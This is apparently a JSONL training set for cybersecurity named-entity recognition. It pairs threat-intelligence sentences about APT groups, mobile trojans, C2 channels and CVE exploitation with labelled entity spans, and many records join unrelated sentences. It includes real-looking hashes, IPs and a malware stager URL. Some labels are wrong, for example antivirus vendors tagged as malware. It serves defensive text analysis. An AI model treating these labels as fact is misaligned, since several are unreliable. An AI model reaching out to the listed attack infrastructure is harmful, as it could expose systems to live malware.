{"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility . The TXT record returned contained data: E0000>0 . Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware ’s behavior .", "spans": {"MALWARE: XLoader": [[67, 74]], "THREAT_ACTOR: APT16": [[109, 114]], "ORGANIZATION: government agency": [[142, 159]], "ORGANIZATION: media organizations": [[191, 210]], "MALWARE: Ransomware source code": [[299, 321]]}, "info": {"id": "cyberner_stix_train_003031", "source": "cyberner_stix_train"}}
{"text": "setFullScreenIntent ( ) – This API wires the notification to a GUI so that it pops up when the user taps on it . Honeybee appears to target humanitarian aid and inter-Korean affairs . “ HexRaysDeob ” However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": {"THREAT_ACTOR: Honeybee": [[113, 121]], "TOOL: HexRaysDeob": [[186, 197]], "THREAT_ACTOR: fraudsters": [[245, 255]]}, "info": {"id": "cyberner_stix_train_003032", "source": "cyberner_stix_train"}}
{"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server ’ s response to execute any commands as instructed by the remote attackers . The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries . This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": {"TOOL: Helminth": [[209, 217]], "TOOL: HTTP": [[358, 362]], "TOOL: DNS": [[367, 370]], "ORGANIZATION: State , Local , Tribal , and Tribunal ( SLTT ) governments": [[582, 640]], "THREAT_ACTOR: LockBit": [[651, 658]], "ORGANIZATION: MS - ISAC": [[670, 679]]}, "info": {"id": "cyberner_stix_train_003033", "source": "cyberner_stix_train"}}
{"text": "Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: threat actors": [[91, 104]], "ORGANIZATION: Unit 42": [[265, 272]], "MALWARE: NetTraveler": [[296, 307]], "VULNERABILITY: exploit": [[321, 328]], "VULNERABILITY: CVE-2012-0158": [[329, 342]], "MALWARE: NetTraveler Trojan": [[354, 372]]}, "info": {"id": "cyberner_stix_train_003034", "source": "cyberner_stix_train"}}
{"text": "Since then , we have seen Poison Ivy samples using third-levels of querlyurl [ . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"MALWARE: Poison Ivy": [[26, 36]], "THREAT_ACTOR: attacks": [[118, 125]], "THREAT_ACTOR: APT33": [[296, 301]]}, "info": {"id": "cyberner_stix_train_003035", "source": "cyberner_stix_train"}}
{"text": "Dragos threat intelligence leverages the Dragos Platform , our threat operations center , and other sources to provide comprehensive insight into threats affecting industrial control security and safety worldwide .", "spans": {"ORGANIZATION: Dragos": [[0, 6], [41, 47]]}, "info": {"id": "cyberner_stix_train_003036", "source": "cyberner_stix_train"}}
{"text": "( Have a look here and here . Hackers are charged with spying on a manufacturer of gas turbines . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system .", "spans": {"THREAT_ACTOR: Hackers": [[30, 37]], "ORGANIZATION: manufacturer": [[67, 79]], "THREAT_ACTOR: attackers": [[138, 147]], "MALWARE: DDE protocol": [[173, 185]]}, "info": {"id": "cyberner_stix_train_003037", "source": "cyberner_stix_train"}}
{"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_003038", "source": "cyberner_stix_train"}}
{"text": "The module contains the following hardcoded C2 server names :", "spans": {"TOOL: C2": [[44, 46]]}, "info": {"id": "cyberner_stix_train_003039", "source": "cyberner_stix_train"}}
{"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": {"ORGANIZATION: VirusTotal": [[65, 75]], "MALWARE: malicious attachments": [[204, 225]], "TOOL: Scout": [[274, 279]], "THREAT_ACTOR: DRAGONFISH": [[374, 384]], "THREAT_ACTOR: Lotus Blossom": [[388, 401]], "MALWARE: Elise": [[433, 438]], "MALWARE: malware": [[439, 446]]}, "info": {"id": "cyberner_stix_train_003040", "source": "cyberner_stix_train"}}
{"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . f9cfda6062a8ac9e332186a7ec0e706a . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": {"SYSTEM: Android 10.0": [[151, 163]], "ORGANIZATION: Myanmar Union Election Commission": [[485, 518]], "ORGANIZATION: UEC": [[521, 524]], "FILEPATH: f9cfda6062a8ac9e332186a7ec0e706a": [[537, 569]], "THREAT_ACTOR: Steal or Forge Authentication Certificates APT29": [[589, 637]]}, "info": {"id": "cyberner_stix_train_003041", "source": "cyberner_stix_train"}}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: financial institutions": [[217, 239]], "THREAT_ACTOR: MoneyTaker group": [[313, 329]]}, "info": {"id": "cyberner_stix_train_003042", "source": "cyberner_stix_train"}}
{"text": "Extensive targeting of defense ministries and other military victims has been observed , the profile of which closely mirrors the strategic interests of the Russian government , and may indicate affiliation with GRU , Russia ’s premier military intelligence service .", "spans": {"ORGANIZATION: GRU": [[212, 215]]}, "info": {"id": "cyberner_stix_train_003043", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , we have had no chance to obtain this file , but we speculate that Device.exe is responsible for opening port 6378 , and the CenterUpdater.exe tool was used for creating tunneling to a remote host .", "spans": {"FILEPATH: Device.exe": [[82, 92]], "FILEPATH: CenterUpdater.exe": [[140, 157]]}, "info": {"id": "cyberner_stix_train_003044", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 104.238.184.252 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 104.238.184.252": [[11, 26]]}, "info": {"id": "cyberner_stix_train_003045", "source": "cyberner_stix_train"}}
{"text": "Connexxa was a company also from Catanzaro . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware . The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"TOOL: ICS malware": [[196, 207]], "MALWARE: backdoor": [[214, 222]], "SYSTEM: Windows": [[231, 238]], "TOOL: WMI": [[278, 281]], "MALWARE: Kaspersky": [[413, 422]], "MALWARE: eScan": [[425, 430]], "MALWARE: F-secure": [[433, 441]], "MALWARE: Bitdefender": [[446, 457]], "ORGANIZATION: The Chaos Creator": [[467, 484]], "ORGANIZATION: Harrison": [[520, 528]], "ORGANIZATION: Ashley Madison": [[533, 547]]}, "info": {"id": "cyberner_stix_train_003046", "source": "cyberner_stix_train"}}
{"text": "Analysis of evasion techniques Along with the standard payload and string obfuscation , Cerberus uses a rather interesting technique to prevent analysis of the Trojan . By introducing small changes to their code and infrastructure , the group has bypassed several security products . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"MALWARE: Cerberus": [[88, 96]], "THREAT_ACTOR: group": [[237, 242]], "THREAT_ACTOR: APT39": [[284, 289]], "ORGANIZATION: telecommunications and travel industries": [[306, 346]], "ORGANIZATION: specific individuals": [[433, 453]]}, "info": {"id": "cyberner_stix_train_003047", "source": "cyberner_stix_train"}}
{"text": "In addition , the same attackers appear to have a lengthy operation history including attacks on other industries and organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_003048", "source": "cyberner_stix_train"}}
{"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts . Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"TOOL: Nidiran back door": [[181, 198]], "TOOL: hacktools": [[222, 231]], "ORGANIZATION: Palestinian govenment": [[316, 337]], "FILEPATH: d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428": [[353, 417]], "THREAT_ACTOR: Attackers": [[420, 429]]}, "info": {"id": "cyberner_stix_train_003049", "source": "cyberner_stix_train"}}
{"text": "Using email as a C2 channel may also decrease the chance of detection , as sending email via non-sanctioned email providers may not necessarily construe suspicious or even malicious activity in many enterprises .", "spans": {"TOOL: email": [[6, 11], [83, 88], [108, 113]], "TOOL: C2": [[17, 19]]}, "info": {"id": "cyberner_stix_train_003050", "source": "cyberner_stix_train"}}
{"text": "The malware then uses WebDAV to upload the RAR archive to a Box account . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: WebDAV": [[22, 28]], "MALWARE: RAR archive": [[43, 54]], "MALWARE: Carbanak": [[103, 111]], "ORGANIZATION: financial institution": [[142, 163]]}, "info": {"id": "cyberner_stix_train_003051", "source": "cyberner_stix_train"}}
{"text": ") “ % USERNAME % , j ’ ai fait l ’ avance ( suivi d ’ un lien ) : leboncoin-le [ . The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": {"THREAT_ACTOR: APT32": [[109, 114], [198, 203]], "TOOL: backdoors": [[140, 149]], "TOOL: scripts": [[154, 161]]}, "info": {"id": "cyberner_stix_train_003052", "source": "cyberner_stix_train"}}
{"text": "Receiver Intent Name Description BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": {"THREAT_ACTOR: APT41": [[160, 165]], "THREAT_ACTOR: APT28": [[338, 343]]}, "info": {"id": "cyberner_stix_train_003053", "source": "cyberner_stix_train"}}
{"text": "All three shared the same IPs and URLs , also provided below .", "spans": {"TOOL: IPs": [[26, 29]], "TOOL: URLs": [[34, 38]]}, "info": {"id": "cyberner_stix_train_003054", "source": "cyberner_stix_train"}}
{"text": "In most cases however , the customers ’ IT operation center don’t know they exist on the network .", "spans": {}, "info": {"id": "cyberner_stix_train_003055", "source": "cyberner_stix_train"}}
{"text": "In the previous campaign where adversaries used Office document exploits as an infection vector , the payload was executed in the Office word process .", "spans": {"TOOL: Office": [[48, 54], [130, 136]]}, "info": {"id": "cyberner_stix_train_003056", "source": "cyberner_stix_train"}}
{"text": "It seems that the people who filled these roles are key to “ Agent Smith ’ s success , yet not quite necessary for actor ’ s legitimate side of business . Starting in December 2014 , the criminal group began running keyloggers in the infected system . With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks . ( CISA , CNN )", "spans": {"MALWARE: Agent Smith": [[61, 72]], "TOOL: keyloggers": [[216, 226]], "ORGANIZATION: CISA": [[509, 513]], "ORGANIZATION: CNN": [[516, 519]]}, "info": {"id": "cyberner_stix_train_003058", "source": "cyberner_stix_train"}}
{"text": "The response can either be a simple \" OK , '' or can be a request to perform some action on the device . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": {"ORGANIZATION: Presidential Administration": [[250, 277]], "THREAT_ACTOR: Gamaredon Group": [[324, 339]], "THREAT_ACTOR: APT37": [[378, 383]]}, "info": {"id": "cyberner_stix_train_003059", "source": "cyberner_stix_train"}}
{"text": "In a root broken device , security is a fairy tale . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 . In later maturity levels , Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework .", "spans": {"THREAT_ACTOR: Cyber Army": [[108, 118]], "THREAT_ACTOR: Ashiyane": [[121, 129]], "THREAT_ACTOR: Cyber Resistance Group": [[140, 162]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[165, 200]], "THREAT_ACTOR: Parastoo": [[203, 211]], "THREAT_ACTOR: Shabgard": [[214, 222]], "THREAT_ACTOR: Iran Black Hats": [[225, 240]], "ORGANIZATION: JumpCloud": [[330, 339]], "MALWARE: malicious code": [[354, 368]]}, "info": {"id": "cyberner_stix_train_003060", "source": "cyberner_stix_train"}}
{"text": "The Tor node would intercept any unencrypted executable files being downloaded and modify those executables by adding a malicious wrapper contained an embedded OnionDuke .", "spans": {"TOOL: Tor": [[4, 7]], "MALWARE: OnionDuke": [[160, 169]]}, "info": {"id": "cyberner_stix_train_003061", "source": "cyberner_stix_train"}}
{"text": "CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[49, 56]]}, "info": {"id": "cyberner_stix_train_003062", "source": "cyberner_stix_train"}}
{"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor . Its C2 is based on IIS using .asp technology to handle the victims’ HTTP . This “ est ” reference could refer to a hacking group with its own message board on which hack520 also posts regularly .", "spans": {"ORGANIZATION: Cybereason": [[132, 142]], "TOOL: Backdoor.Win32.Denis": [[181, 201]], "THREAT_ACTOR: OceanLotus Group": [[209, 225]], "THREAT_ACTOR: threat actor": [[313, 325]], "TOOL: C2": [[332, 334]], "TOOL: IIS": [[347, 350]], "FILEPATH: .asp": [[357, 361]], "ORGANIZATION: hack520": [[493, 500]]}, "info": {"id": "cyberner_stix_train_003063", "source": "cyberner_stix_train"}}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"MALWARE: RIPPER": [[58, 64]], "ORGANIZATION: Government officials": [[132, 152]]}, "info": {"id": "cyberner_stix_train_003064", "source": "cyberner_stix_train"}}
{"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": {"MALWARE: DroidJack RAT": [[91, 104]], "THREAT_ACTOR: admin@338": [[233, 242]], "ORGANIZATION: financial services": [[310, 328]], "ORGANIZATION: telecoms": [[331, 339]], "ORGANIZATION: government": [[342, 352]], "ORGANIZATION: defense sectors": [[359, 374]], "FILEPATH: 1.doc": [[377, 382]], "FILEPATH: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[385, 449]], "ORGANIZATION: Mandiant": [[452, 460]]}, "info": {"id": "cyberner_stix_train_003065", "source": "cyberner_stix_train"}}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]], "THREAT_ACTOR: actor": [[257, 262]], "VULNERABILITY: CVE-2012-0158": [[302, 315]], "THREAT_ACTOR: Spring Dragon": [[339, 352]]}, "info": {"id": "cyberner_stix_train_003066", "source": "cyberner_stix_train"}}
{"text": "In a sample I recently analyzed , something stood out as extremely suspicious which led me down a rabbit hole , uncovering malicious infrastructure supporting Chthonic , Nymaim , and other malware and malicious websites .", "spans": {"MALWARE: Chthonic": [[159, 167]], "MALWARE: Nymaim": [[170, 176]]}, "info": {"id": "cyberner_stix_train_003067", "source": "cyberner_stix_train"}}
{"text": "The Mimikatz variant uploaded to these two organizations is unique , as it involves a seemingly custom loader application written in .NET .", "spans": {"TOOL: Mimikatz": [[4, 12]], "TOOL: .NET": [[133, 137]]}, "info": {"id": "cyberner_stix_train_003068", "source": "cyberner_stix_train"}}
{"text": "Android bots have also already been found being controlled via other non-traditional means – blogs or some of the many cloud messaging systems like Google ’ s or Baidu ’ s – but Twitoor is the first Twitter-based bot malware , according to Štefanko . In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: Google": [[148, 154]], "ORGANIZATION: Baidu": [[162, 167]], "MALWARE: Twitoor": [[178, 185]], "SYSTEM: Twitter-based": [[199, 212]], "THREAT_ACTOR: Scattered Canary’s": [[290, 308]], "THREAT_ACTOR: Lazarus": [[354, 361]], "ORGANIZATION: banks": [[475, 480]]}, "info": {"id": "cyberner_stix_train_003069", "source": "cyberner_stix_train"}}
{"text": "] 132:28833 61 [ . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth . This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications . Figure 1 : URL vulnerable to CVE-2023 - 4966 https://<Gateway or ADC IP address>/oauth / idp/.well - known / openid - configuration", "spans": {"THREAT_ACTOR: group": [[136, 141]], "TOOL: PowerShell": [[231, 241]], "TOOL: Empire Invoke-PSInject": [[269, 291]], "VULNERABILITY: CVE-2023 - 4966": [[360, 375]]}, "info": {"id": "cyberner_stix_train_003071", "source": "cyberner_stix_train"}}
{"text": "Trojan details Upon boot , the trojan will start by populating a shared preferences file with the configuration it has on its internal structures . During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[178, 189]], "ORGANIZATION: FireEye iSIGHT Intelligence": [[414, 441]], "THREAT_ACTOR: APT37": [[488, 493]], "VULNERABILITY: zero-day": [[506, 514]], "TOOL: Adobe Flash": [[515, 526]], "VULNERABILITY: CVE-2018-4878": [[543, 556]], "MALWARE: DOGCALL": [[573, 580]], "MALWARE: malware": [[581, 588]]}, "info": {"id": "cyberner_stix_train_003072", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . The affected organizations we were able to identify are mostly based in the Middle East .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]]}, "info": {"id": "cyberner_stix_train_003073", "source": "cyberner_stix_train"}}
{"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit . Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks . In April 2023 , media reports suggested that the U.S. government determined that Zarya breached a Canadian oil pipeline .", "spans": {"MALWARE: Desert Scorpion": [[0, 15]], "ORGANIZATION: Fatah": [[156, 161]], "THREAT_ACTOR: Lazarus Group": [[230, 243]], "THREAT_ACTOR: group": [[365, 370]], "THREAT_ACTOR: Bluenoroff": [[394, 404]], "THREAT_ACTOR: Elfin": [[504, 509]]}, "info": {"id": "cyberner_stix_train_003074", "source": "cyberner_stix_train"}}
{"text": "2014 : OnionDuke gets caught using a malicious Tor node .", "spans": {"MALWARE: OnionDuke": [[7, 16]], "TOOL: Tor": [[47, 50]]}, "info": {"id": "cyberner_stix_train_003075", "source": "cyberner_stix_train"}}
{"text": "DeltaCharlie is a DDoS tool used by HIDDEN COBRA actors , and is referenced and detailed in Novetta 's Operation Blockbuster Destructive Malware report .", "spans": {"MALWARE: DeltaCharlie": [[0, 12]], "THREAT_ACTOR: HIDDEN COBRA": [[36, 48]], "ORGANIZATION: Novetta": [[92, 99]]}, "info": {"id": "cyberner_stix_train_003076", "source": "cyberner_stix_train"}}
{"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. , IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g. While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved away from applications like wget , Remote Manipulator Tool , VNC and ChkFlsh.exe . If the next block is resolved , The overlaps in targeting and sharing of infrastructure amongst DPRK groups highlights the continued targeting and coordinated interest in the cryptocurrency field .", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]], "TOOL: batch scripts": [[526, 539]], "TOOL: SFX files": [[544, 553]], "THREAT_ACTOR: Gamaredon Group": [[560, 575]], "TOOL: wget": [[614, 618]], "TOOL: Remote Manipulator Tool": [[621, 644]], "TOOL: VNC": [[647, 650]], "TOOL: ChkFlsh.exe": [[655, 666]], "THREAT_ACTOR: DPRK groups": [[765, 776]]}, "info": {"id": "cyberner_stix_train_003077", "source": "cyberner_stix_train"}}
{"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 . The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": {"TOOL: RAT": [[189, 192]], "THREAT_ACTOR: actors": [[225, 231]], "MALWARE: POSHC2": [[402, 408]], "IP_ADDRESS: 192.119.15.35 880": [[418, 435]], "URL: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[436, 481]], "ORGANIZATION: Ukraine": [[535, 542]], "MALWARE: wiper malware": [[646, 659]]}, "info": {"id": "cyberner_stix_train_003078", "source": "cyberner_stix_train"}}
{"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . The malware can delete various requests based on the command below . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": {"MALWARE: Exodus One": [[195, 205]], "THREAT_ACTOR: XENOTIME": [[273, 281]], "ORGANIZATION: Dragos WorldView": [[389, 405]], "TOOL: Cisco Secure Web Appliance": [[477, 503]], "TOOL: Web Security Appliance": [[515, 537]]}, "info": {"id": "cyberner_stix_train_003079", "source": "cyberner_stix_train"}}
{"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ . The attacks targeted high-profile targets , including government and commercial organizations . The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . Previous versions of TIEDYE were configured to persist via a LaunchAgent .", "spans": {"ORGANIZATION: government": [[163, 173]], "ORGANIZATION: commercial organizations": [[178, 202]], "FILEPATH: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[290, 354]], "MALWARE: Previous versions of TIEDYE": [[357, 384]]}, "info": {"id": "cyberner_stix_train_003080", "source": "cyberner_stix_train"}}
{"text": "In fact , the oldest samples of the loader that we have found were used with PinchDuke .", "spans": {"TOOL: loader": [[36, 42]], "MALWARE: PinchDuke": [[77, 86]]}, "info": {"id": "cyberner_stix_train_003081", "source": "cyberner_stix_train"}}
{"text": "Other variants use other names and logos , as described later . This mode of operation is typical of many hacker groups—and especially of Winnti . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": {"THREAT_ACTOR: hacker": [[106, 112]], "THREAT_ACTOR: Winnti": [[138, 144]], "ORGANIZATION: The New York Times": [[171, 189]], "THREAT_ACTOR: APT12": [[232, 237]], "MALWARE: Backdoor.APT.Aumlib": [[294, 313]], "MALWARE: Backdoor.APT.Ixeshe malware families": [[318, 354]]}, "info": {"id": "cyberner_stix_train_003082", "source": "cyberner_stix_train"}}
{"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail . Establishing a foothold involves actions that ensure control of the target network ’s systems from outside the network . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"SYSTEM: Android": [[41, 48]], "VULNERABILITY: vulnerability": [[601, 614]]}, "info": {"id": "cyberner_stix_train_003083", "source": "cyberner_stix_train"}}
{"text": "RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process .", "spans": {"MALWARE: RCSession": [[0, 9]], "FILEPATH: English.rtf": [[43, 54]], "FILEPATH: svchost.exe": [[83, 94]]}, "info": {"id": "cyberner_stix_train_003084", "source": "cyberner_stix_train"}}
{"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[56, 63]], "ORGANIZATION: political intelligence": [[165, 187]], "ORGANIZATION: governments and NGOs": [[193, 213]]}, "info": {"id": "cyberner_stix_train_003085", "source": "cyberner_stix_train"}}
{"text": "The compiled code itself already is altered per deployment in multiple subtle ways , in order to stymie identification and automated analysis and accommodate targeted environments .", "spans": {}, "info": {"id": "cyberner_stix_train_003086", "source": "cyberner_stix_train"}}
{"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": {"TOOL: IoT": [[83, 86]]}, "info": {"id": "cyberner_stix_train_003087", "source": "cyberner_stix_train"}}
{"text": "Instead , the user must scroll to the third page of the document , which will load a Flash object that contains ActionScript that will attempt to exploit the user ’s system to install a malicious payload .", "spans": {"TOOL: Flash": [[85, 90]], "TOOL: ActionScript": [[112, 124]]}, "info": {"id": "cyberner_stix_train_003088", "source": "cyberner_stix_train"}}
{"text": "Once received , Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine .", "spans": {"TOOL: Responder": [[16, 25]]}, "info": {"id": "cyberner_stix_train_003089", "source": "cyberner_stix_train"}}
